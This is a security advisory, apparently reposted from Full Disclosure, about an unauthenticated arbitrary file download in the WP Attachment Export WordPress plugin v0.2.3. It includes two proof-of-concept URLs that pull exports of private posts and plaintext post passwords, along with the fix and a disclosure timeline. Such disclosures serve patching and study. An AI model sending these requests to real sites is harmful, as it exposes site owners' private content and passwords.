WordPress WP Attachment Export 0.2.3 Arbitrary File Download Vulnerability

# Title: Arbitrary File Download in WP Attachment Export Wordpress Plugin v0.2.3
# Submitter: Nitin Venkatesh
# Product: WP Attachment Export Wordpress Plugin
# Product URL: https://wordpress.org/plugins/wp-attachment-export/
# Vulnerability Type: Arbitrary File Download
# Affected Versions: v0.2.3
# Tested versions: v0.2.3
# Fixed Version: v0.2.4
# Link to code diff: https://plugins.trac.wordpress.org/changeset/1170732/
# Changelog: https://wordpress.org/plugins/wp-attachment-export/changelog/
# CVE Status: None/Unassigned/Fresh

## Product Information:

WP Attachment Export allows you to export your media library into a
WordPress eXtended RSS or WXR file. You can then use the Tools->Import
function in another WordPress installation to import the media library.

## Vulnerability Description:

The WP Attachment Export Wordpress Plugin v0.2.3 is susceptible to
Arbitrary File Download wherein anyone(unauthenticated user) could download
the XML data that holds all the details of attachments/posts on a Wordpress
powered site. This includes details of even privately published posts and
password protected posts with their passwords revealed in plain text.

## Proof-of-Concept:

Download attachment details:
http://localhost/wp-admin/tools.php?content=attachment&wp-attachment-export-download=true

Download Wordpress content details:
http://localhost/wp-admin/tools.php?content=&wp-attachment-export-download=true

## Solution:

Upgrade to v0.2.4 of the plugin.

## Disclosure Timeline:

2015-05-30 - Mailed report to developer
2015-05-30 - Updated v0.2.4 released
2015-07-14 - Publishing disclosure on FD.

## Disclaimer:

This disclosure is purely meant for educational purposes. I will in no way be responsible as to how the information in this disclosure is used.

#  0day.today [2018-01-04]  #